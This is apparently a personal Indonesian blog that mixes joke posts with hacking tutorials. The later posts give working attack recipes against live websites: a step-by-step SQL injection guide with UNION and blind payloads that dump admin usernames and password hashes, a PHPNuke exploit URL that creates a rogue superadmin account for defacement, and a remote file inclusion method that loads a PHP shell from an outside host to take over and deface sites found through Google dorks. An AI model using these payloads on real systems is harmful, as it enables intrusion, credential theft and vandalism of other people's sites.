Andhika Veraza

Laki-laki, 18 tahun

Mojokerto, Indonesia

Banggalah pada dirimu sendiri, Meski ada yang tak Menyukai. Kadang mereka membenci karena Mereka tak mampu menjadi seperti dirimu.
::
Start
Windows 8 SM Versi 3
Shutdown

Navbar3

Cari Blog Ini

19.11.08

Obat nyamuk ampuh

Seorang wanita ingin membli obat nyamuk terampuh. Tentu saja wanita ini ingin membeli yang terbaik dan mewah.
Wanita pembeli: Apakah Anda bisa menjamin obat nyamuk ini?
Penjual: Tentu saja saya menjamin sepenuhnya.
Wanita pembeli: Bagaimana kalau obat nyamuk ini meracuni Anda dan
Anda mati?
Penjual: Hal itu tidak mungkin terjadi. Saya tidak memakai obat nyamuk ini. Terlalu mewah untuk saya.
Wanita pembeli: Maksud saya, bagaimana kalau obat nyamuk ini meracuni saya dan saya mati?
Penjual: Jaminannya langsung diberikan. Kami akan segera mengembalikan
harga sisa obat nyamuk yang belum terpakai. Suami Anda pasti senang
menerimannya.
Read More --►

Tarif sewa pejantan

Karena suatu urusan, Pak Bedjo terpaksa harus meninggalkan usahanya penyewaan hewan-hewan pejantan selama beberapa hari. Sebelum pergi, dia menyampaikan beberapa instruksi penting kepada pembantunya.
"Dul, jika ada yang ingin memakai jasa sapi jantan kita, sewanya 100.000 per hari. Jika ada yang ingin memakai jasa kambing, sewanya 75.000 per hari. Jika ada yang ingin memakai jasa babi, sewanya 50.000 per hari. Jelas kan ?" Dul mengulangi daftar tarif itu dihadapan majikannya.
Dan setelah merasa yakin akan kemampuan anak buahnya, maka pergilah pak Bedjo. Besoknya, Dul didatangi seorang petani.
" Dimana Pak Bedjo ?"
" Keluar kota beberapa hari. Tapi saya diberi kepercayaan untuk menggantikannya. Apa yang bisa saya bantu ?"
" Sebenarnya saya ingin berbicara langsung dengan majikanmu. Puteranya telah berhubungan cukup lama dengan putriku, karena itu ... "
Dul langsung menyela, "... Kalau begitu lebih baik anda menunggu sampai majikan saya datang saja. Sebab saya tidak diberitahu berapa tarif puteranya per hari".
Read More --►

Jangan boros

Nasrudin berlayar dengan kapal besar. Cuaca cerah menyegarkan, tetapi Nasrudin selalu mengingatkan orang akan bahaya cuaca buruk. Orang-orang tak mengindahkannya. Tapi kemudian cuaca benar-benar menjadi buruk, badai besar menghadang, dan kapal terombang ambing nyaris tenggelam. Para penumpang mulai berlutut, berdoa, dan berteriak-teriak minta tolong. Mereka berdoa dan berjanji untuk berbuat sebanyak mungkin kebajikan jika mereka selamat.
"Teman-teman!" teriak Nasrudin. "Jangan boros dengan janji-janji indah! Aku melihat daratan!"
Read More --►

100 tahun lalu

Endah yang berumur 7 tahun menceritakan harapannya kepada sang ibu,
Endah: "Aku berharap dilahirkan 100 tahun yang lalu!"
Ibu : "Ya ampun, emangnya kenapa sih?"
Endah: "Karena pasti ibu tidak akan tega menyuruh aku yang sudah berumur 100 tahun merapikan tempat tidurku sendiri."
Read More --►

Vivin sangat sensitif

Ibu Vivin memasukkan Vivin ke sebuah sekolah negeri di kotanya. Karena Vivin adalah anak kesayangannya, maka sang ibu memberikan instruksi yang panjang kepada guru Vivin di hari pertama Vivin masuk sekolah.
"Vivin kecilku adalah seorang anak yang sangat sensitif dan perasaannya sangatlah halus," kata sang ibu.
"Jadi tolong jangan pernah hukum dia. Kalau Vivin nakal, pukul saja anak yang duduk di sebelahnya. Itu sudah cukup untuk membuat Vivin takut."
Read More --►

Dokter, saya sekarat

Siang-siang waktu istirahat, seorang dokter dikejutkan oleh seseorang yang menangis tersedu-sedu sambil berkata "Saya tidak mau mati, Dokter".
Merasa kasihan dengan orang itu, sang dokter merelakan waktu istirahat siangnya. Lalu dokter itu berkata " Ada apa? coba ceritakan masalahmu!"
Lalu dengan tersengguk-sengguk pasien itu berkata, "Dokter, jika saya menyentuh bagian tubuh saya, yang mana saja, saya merasa sakit. Lihat ini dokter!", Kemudian pasien itu menyentuh bagian dadanya dengan tangannya, lalu berteriak kesakitan, menyentuh bagian kepalanya dengan tangannya, kemudian ia berteriak kesakitan lagi, ia terus berteriak ketika ia menyentuh bagian anggota tubuh yang lain dengan tangannya. Pasien itu berkata " Lihat kan Dokter saya sekarat "
Lalu dengan tersenyum dokter itu berkata, " jari tangan kamu patah".
Read More --►

Aku yang akan membayar kamu

Pada suatu hari, seorang pria sedang berjalan-jalan dengan seekor anjingnya. Namun sayang tali pengikat leher anjingnya terlepas dan anjing itu melarikan diri. Pria itu mengejar anjingnya di jalanan, tapi naas karena anjing itu memasuki halaman sebuah rumah dan menggigit seorang nyonya yang tinggal di rumah itu.
Wanita itu marah-marah sambil masuk ke dalam rumah untuk memanggil suaminya, agar suaminya membuat perhitungan dgn pria & anjingnya itu.
Pemilik anjing yang gemetar ketakutan ketika suami wanita itu mendekatinya segera berkata, "Tuan, bagaimana kalau diselesaikan baik-baik. Apakah uang sebesar Rp 25.000,00 sudah cukup?"
Suami wanita itu terdiam sesaat dan menjawab, "Setuju! Tapi minggu depan akulah yang akan membayarmu sebesar Rp 25.000,00 kalau kau melepas anjingmu lagi pada waktu istriku di halaman depan."
Read More --►

Ada istriku dan pacar gelapku

Pada saat pesta ada 2 laki-laki sedang asyik membicarakan tentang selingkuhan mereka. Pada saat sedang enak-enaknya ngobrol tiba-tiba wajah orang yang pertama menjadi pucat melihat 2 wanita sedang asyik mengobrol, lalu dia berkata pada temannya, "Hei, jangan kesana, disana ada istriku bersama pacar gelapku"
Setelah beberapa saat temannya berkata "Kau tahu aku juga mau bilang begitu”.
Read More --►

Kegigihan si cadel

Seorang cadel ingin membeli nasi goreng yang sering mangkal di dekat rumahnya.
cadel:"bang, beli nasi goleng satu.
abang:"apa...?" (.....ngeledek.)
cadel:"Nasi Goleng!
abang:"Apaan...?(.....Ngeledek lagi.)
cadel:"Nasi Goleng!!!"
abang:"ohh nasi goleng..." Sambil ditertawakan oleh pembeli yang lain dan pulanglah si cadel dengan sangat kesal. Sesampainya di rumah dia bertekad untuk berlatih mengucapkan "nasi goreng" dengan benar. Hingga akhirnya dia mampu mengucapkan dengan baik dan benar

Hari ke-2.
Dengan perasaan bangga, si cadel ingin menunjukkan bahwa dia bisa mengucapkan pesanan dengan tidak cadel lagi
cadel:"bang...,saya mau beli NASI GORENG, bungkus!!!"
abang:"ohh...pake apa?"
cadel:"...pake telol..." Sambil sedih...
Akhirnya kembali dia berlatih mengucapkan kata "telor" sampai benar.

Hari ke-3.
Untuk menunjukkan bahwa dia mampu, dia rela 3 hari berturut - turut makan nasi goreng:
cadel:"bang..., beli NASI GORENG, Pake TELOR!!! Bungkus!"
abang:"ceplok atau dadar ?"
cadel:"dadal..."
Dengan spontan.Kembali dia berlatih dengan keras.

Hari ke-4.
Dengan modal 4 hari berlatih lidah hari ini dia yakin mampu memesan dengan tanpa ditertawakan.
cadel:"bang...,beli NASI GORENG, Pake TELOR, di DADAR!"
abang:"hebat kamu "del, udah nggak cadel lagi nich, harganya Rp.2500 del."
si cadel menyerahkan uang Rp.3000 kepada si abang, namun si abang tidak memberikan kembaliannya, hingga si cadel bertanya:
cadel: "bang.., kembaliannya?"
abang: "oh iya, uang kamu Rp.3000, harganya Rp.2500, kembalinya berapa del?" sambil senyum ngeledek. Si cadel gugup juga untuk menjawabnya, dia membayangkan besok bakal makan nasi goreng lagi.
Tapi akhirnya dia menjawab:"...GOPEK!" Sambil tersenyum penuh kemenangan.
Read More --►

Jenis-jenis KB

1. Kalau 5 tahun kawin, langsung punya 4 anak, itu
berarti KB = KUMPUL BOCAH.
2. Kalau 5 tahun kawin, anak cuma satu, itu
berarti KB = KURANG BERGAIRAH.
3. Kalau sudah 5 tahun kawin, belum punya anak, itu
berarti, KB = KURANG BISA.
4. Kalau 5 tahun pacaran belum juga kawin, itu
berarti, KB = KAGAK BERANI.
5. Kalo kagak pacaran tapi punya anak, itu
berarti KB = Ketelanjuran Bunting
6. Kalo kagak punya pacar dan anak, itu
berarti KB = Kayaknya Bencong deh
Read More --►

5.11.08

Tutorial SQL Injection

Tutorial SQL Injection (mysql) bhs Indonesia by coldboyz #level9-team

Di tutorial ini saya akan menggambarkan bagaimana cara kerja sql injection dan bagaimana cara menggunakan ini, mendapatkan informasi yang berguna.


Pertama-tama: apa sih sql injection?

itu adalah salah satu dari vulnerable di aplikasi jaringan sekarang. Mengizinkan penyerang menjalankan permintaan database di alamat web dan memperoleh akses informasi penting dan lain-lain. . .

1. SQL Injection (klasik atau basis error atau terserah kamu menyebutnya)

2. Blind SQL Injection ( bagian lebih keras )

Mari kita mulai beraksi :D

1. Melihat kemungkinan vulnerable

Contohnya kita punya situs seperti ini....

http: /www. situs. com/news.php? id=5

Sekarang kita test jika vulnerable. Kita tambahkan ujung alamat web dengan ' (tanda kutip)

akan menjadi http: /www. situs. com/news.php? id=5'

jika kita memperoleh error seperti :

" You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right dl.."
atau apapun yang mirip Itu berarti vulnerable untuk melakukan sql injection : )

2. Mencari banyaknya kolom

Untuk menemukan jumlah kolom kita menggunakan pernyataan ORDER BY (menceritakan database bagaimana hasil order)

Bagaimana cara menggunakan itu? baik hanya incrementing nomor sampai kita memperoleh kesalahan.

http: /www. situs. com/news.php? id=5 order by 1/ <-- tidak error?
http: /www. situs. com/news.php? id=5 order by 2/ <-- tidak error?
http: /www. situs. com/news.php? id=5 order by 3/ <-- tidak error?
http: /www. situs. com/news.php? id=5 order by 4/ <-- error (kami memperoleh pesan seperti ini Unknown column '4' in 'order clause' atau kira-kira seperti tu

berarti bahwa ini punya 3 kolom sebab kami mendapatkan kesalahan di 4.

3. Melihat kemungkinan fungsi UNION?

dengan union kita dapat memilih banyak data di satu pernyataan sql.

Misal kita punya
http: /www. situs. com/news.php? id=5 union all select 1,2,3/* (kita telah menemukan jumlah 3 kolom di seksi 2. )

jika kita lihat jumlah di layar i.e 1 or 2 or 3 berarti UNION bekerja! :)
: )

4. Melihat kemungkinan versi mysql? ?

http: /www. situs. com/news. php? id=5 union all select 1,2,3/* catatan: jika /* tidak bekerja atau kamu memperoleh kesalahan? Ubah ke --

itu adalah suatu komentar dan ini adalah penting untuk kita bekerja semestinya.

katakan kita punya nomor 2 di layar itu? sekarang melihat kemungkinan versi? kami menggantikan nomor 2 dengan @@version atau version() dan menerima pesan seperi 4.1.33-log atau 5.0.45 atau mirip itu lah..

ini harus menyerupai ini http: /www. situs. com/news. php? id=5 union all select 1,@@version,3/*

jika kamu memperoleh kesalahan "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

saya tidak lihat beberapa paper covering masalah ini, saya harus menulis ini :)

apa yang kita perlukan adalah fungsi convert()

i.e.

http: /www. situs. com/news. php? id=5 union all select 1,convert(@@version using latin1),3/*

atau dengan hex() dan unhex()

i.e
http: /www. situs. com/news. php? id=5 union all select 1,unhex(hex(@@version)),3/*

dan kamu akan memperoleh versi mysql :D

5. memperoleh table dan nama kolom? ? baik jika versi mysql < 5 (i.e 4.1.33, 4.1.12...) <--- nanti saya akan menggambarkan untuk mysql > versi 5.

Kita harus mengira table dan nama kolom umumnya.

Biasanya nama table adalah : user/s, admin/s, member/s ...

nama kolom biasanya adalah : username, user, usr, user_name, password, pass, passwd, pwd dan lain-lain. . .

i.e akan menjadi

http: /www. situs. com/news. php? id union all select 1,2,3 from admin/* (kita lihat nomor 2 di layar seperti sebelumnya,itu berarti ok :D

Kita mengetahui bahwa ada table admin. . .

sekarang memeriksa nama kolom.

http: /www. situs. com/news. php? id=5 union all select 1,username,3 from admin/* (jika kamu memperoleh kesalahan? Coba pakai nama kolom lainnya)
kita memperoleh username ditampilkan di layar, contoh seperti admin? atau superadmin dan lain-lain. . .

sekarang memeriksa jika ada kolom password nya
http: /www. situs. com/news. php? id= union all select 1,password,3 from admin/* (jika kamu memperoleh kesalahan? Coba pakai nama kolom lainnya)

Kita melihat password di layar hash atau plain-text ini bergantung dari bagaimana database menyediakan : )

i.e md5 hash, mysql hash, sha1...

sekarang kita harus menyelesaikan query

untuk itu kita dapat menggunakan concat() function (ini ikut rangkaian itu)

i.e

http: /www. situs. com/news. php? id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

catat bahwa saya meletakkan 0x3a, nilai hex nya untuk: ( 0x3a nilai hexuntuk tanda titik dua)

ada jalan lainnya untuk itu, char(58) untuk nilai ascii : )

http: /www. situs. com/news. php? id=5 union all select 1,concat(username,char(58),password),3 from admin/*

sekarang kita memperoleh username: password di layer, i.e admin: admin atau admin: hash

bila kamu punya ini? kamu dapat login seperti admin atau superuser :D

jika tidak bisa mengira nama table yang benar, kamu dapat menggunakan mysql.user (default)

ini punya user i kolom password

contohnya

http: /www. situs. com/news. php? id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6. MySQL 5

Seperti yang saya katakana sebelumnya saya ingin menjelaskan bagaimana cara memperoleh table dan kolom di mysql > 5.

untuk ini kita perlu information_schema.
ini memegang semua table dan kolom di database.

Untuk memperoleh table kita menggunakan table_name dan information_schema.tables

i.e

http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables/*

disini kita menggantikan nomor 2 kita dengan table_name untuk memperoleh table pertama dari information_schema.tables

ditampilkan di layar. sekarang kita harus menambahkan LIMIT pada akhir dari query untuk mengeluarkan semua daftar table.

i.e http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Catat bahwa saya menulis 0,1 (memperoleh 1 hasil permulaan dari 0th)
sekarang untuk melihat table yang kedua,kita merubah limit 0,1 ke limit 1,1

i.e

http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

table kedua telah ditampilkan.

untuk table ketiga kita tuliskan limit 2,1

i.e

http: /www. situs. com/news. php? id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

simpan incrementing sampai kamu memperoleh info berguna seperti db_admin, poll_user, auth, auth_user :D

untuk memperoleh kolom metodenya sama.

disini kita menggunakan column_name and information_schema.columns

metode sama seperti di atas contohnya seperti:

http: /www. situs. com/news. php? id=5 all select 1,column_name,3 from information_schema.columns limit 0,1/*

kolom pertama telah terlihat.

yang kedua (kita rubah limit 0,1 ke limit 1,1) yaitu :

i.e

http: /www. situs. com/news. php? id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

kolom kedua terlah terlihat jadi simpan incrementing sampai kamu memperoleh sesuatu seperti

username,user,login, password, pass, passwd dan lain-lain. . . :D

jika kamu ingin menampilkan nama kolom untuk table khusus gunakan query ini. (dimana anak kalimat)

Kira-kira kita menemukan table users itu.

i.e

http: /www. situs. com/berita. php? id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

sekarang kita memperoleh tampilan nama kolom di table users. hanya menggunakan LIMIT kita mendapatkan semua daftar kolom di table users.

NOTE : ini tidak mau bekerja jika magic quotes = ON

Kira-kira kita menemukan colums user, pass dan email.

Sekarang untuk menyelesaikan query untuk meletakkan mereka bersama-sama :D

untuk itu kita menggunakan concat() , i decribe dulu.

i.e

http: /www. situs. com/news. php? id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

apa kita dapat disini adalah user:pass:email dari table users.

contoh: admin:hash :emailnya@situs.com

itulah isi semua bagian itu, sekarang kami dapat memproses ke bagian yang lebih keras : )

2. Blind SQL Injection

Blind injection ini agak rumit injeksi klasik tetapi ini bisa dilakukan :D

saya harus katakan, ada tutorial blind sql injection yang sangat baik oleh xprog, tidak jelek untuk membaca ini :D

Mari kita mulai dengan bahan lanjutan.

saya akan menggunakan contoh kita

http: /www. situs. com/news. php? id=5

bila kita menjalankan ini, kita lihat halaman dan artikel pada halaman itu, gambar-gambar dan lain-lain. . .

kemudian bila kita ingin mencoba ini untuk serangan blind sql injection

http: /www. situs. com/news. php? id=5 and 1=1 <--- ini selalu benar

dan tampilan halaman normal, itu pertanda baik.

Sekarang percobaan nyata

http: /www. situs. com/news. php? id=5 and 1=2 <--- ini adalah salah

jadi jika teks? gambar atau isi hilang di halaman maka situs itu vulnerable untuk blind sql injection.

1) memperoleh versi mysql

Untuk memperoleh versi serangan blind kami menggunakan substring

i.e

http: /www. situs. com/news. php? id=5 and substring(@@version,1,1)=4

ini akan menampilkan TRUE jika versi mysql 4.
gantikan 4 dengan 5 dan jika query menampilkan TRUE jika versi 5.

i.e

http: /www. situs. com/news. php? id=5 and substring(@@version,1,1)=5

2) Test jika subselect bekerja

bila select tidak bekerja, kita menggunakan subselect

i.e

http: /www. situs. com/berita. php? id=5 and (select 1)=1

jika tampilan halaman normal berarti subselect bekerja.

kemudian kita ingin lihat jika kita punya akses ke mysql.user

i.e

http: /www. situs. com/news. php? id=5 (select 1 from mysql.user limit 0,1)=1

jika tampilan halaman normal berarti kita punya akses ke mysql.user dan kemudian nanti kita dapat menarik password menggunakan load_file() function dan OUTFILE

3) cek table dan nama kolom

bagian ini bila menebak teman terbaik : )

i.e

http: /www. situs. com/news. php? id=5 and (select 1 from users limit 0,1)=1 (dengan limit 0,1 query kita disini menampilkan 1 baris data, sebab subselect menampilkan hanya 1 baris, ini sangat penting. )

kemudian jika tampilan halaman normal tanpa isi hilang, berarti ada table user .

jika kamu memperoleh FALSE ( artikel hilang), kita hanya merubah table name sampai kamu dapat 1 yang benar : )

seumpama kita telah menemukan table name itu adalah users, sekarang apa kita butuhkan adalah nama kolom.

sama halnya table name, kita mulai menebak. Seperti yang saya katakan sebelumnya cobalah untuk nama biasa untuk kolom.

i.e

http: /www. situs. com/news. php? id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

jika tampilan halaman normal kita mengetahui bahwa nama kolom adalah password jika kita memperoleh FALSE cobalah nama biasa atau hanya mengira-ngira

disini kami menggabungkan 1 dengan password kolom, kemudian substring kembali ke karakter pertama (,1,1)

4) Menarik data dari database

Kita menemukan table users i columns username password jadi kita ingin menarik karakter-karakter dari itu.

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

OK ini menarik karakter pertama dari pengguna pertama di table users.

substring disini menampilkan karakter pertama dan 1 karakter di lenght. Ascii() mengkonversikan 1 karakter ke nilai ascii

kemudian bandingkan ini dengan simbol lebih besar dari >.

jika ascii char lebih besar dari 80, tampilan halaman normal. (TRUE)

kita terus mencoba sampai kita memperoleh false.

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

kami memperoleh TRUE, simpan incrementing

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE lagi,lebih tinggi

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

False! ! !

Jadi karakter pertama di username adalah char(99) gunakan ascii konvertor kita tahu bahwa char(99) adalah 'c'.

kemudian mari kita memeriksa karakter yang kedua.

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Ingat bahwa saya merubah ,1,1 to ,2,1 untuk memperoleh karakter yang kedua. (sekarang ini menampilkan karakter yang kedua, 1 karakter di lenght

http: /www. situs. com/berita. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, tampilan halaman normal, lebih tinggi

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

False, nomor lebih rendah.

http: /www. situs. com/news. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE,lebih tinggi.

http: /www. situs. com/berita. php? id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE! ! !

Kita mengetahui bahwa karakter yang kedua adalah char(105) dan itu adalah 'i'.
Kita punya 'ci' saat ini

Simpan incrementing sampai kamu memperoleh akhir. (bila >0 menampilkan salah kita mengetahui bahwa kita telah mencapai akhir).

ada beberapa alat-alat untuk Blind SQL Injection, saya pikir sqlmap adalah yang terbaik, tetapi saya melakukannya dengan manual

sebab itu membuat kamu lebih baik dari sql injektor :D
Read More --►

Deface situs PHPNuke

Wuihh akhirnya hari yang melelahkan saya telah lewat heheheh,,, Dan akhirnya kemarin saya meng-copy dari webnya hacker jambi semua artikel tentang cara men-Deface web dan semuanya segera akan saya postkan untuk kalian semua hahaha GBU :)

Deface situs PHPNuke

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. www.target.com/nuke/index.php atau www.target.com/phpnuke/index.php

2. www.target.com/nuke/admin.php => yg diatas tadi dirubah menjadi admin.php

3. Masukkan bug ini di belakang situs tadi :
?op=AddAuthor&add_aid=J4mbi&add_name=God&add_pwd=H4ck3r&add_email=
king_burger@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Misalnya : www.target.com/nuke/admin.php?op=AddAuthor&add_aid=J4mbi&add_name=God&add_pwd=H4ck3r&add_
email=king_burger@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjoxKalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing muncul www.target.com/nuke/admin.php?op=mod_author

4. Masukin id & password tadi. Masih ingat kan ? lihat yg di atas tadi !
username : J4mbi
password : H4ck3r

5. Kalo udah masuk ke “Administration Menu” situs tsb. Berarti kamu udah mengusai situs tsb skrg.
Skrg kamu pilih gambar Handphone (dibawahnya ada tulisan Messages).
Kolom Title : Hacked by namanickkamu
Kolom Content : Path your web !!!
Hey admin…….do you a need help ?
Matrix.Dal.Net - #Jambihackerlink



Kolom Expiration : Unlimited
Trus klik tab Add Messages yg ada dibawah.

6. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : www.target.com/nuke/index.php atau www.target.com/phpnuke/index.php. Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
Read More --►

Langkah Sederhana Buat Deface

Ini ada tutorial Cara deface yg nyaman

1. Buka www.milw0rm.com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda '='[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <-- untuk file | drwxrwxrwx / drw-rw-rw <-- untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana...
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi
Original post by ping_win (kta lg males ngetik)

Semoga membantu,
Read More --►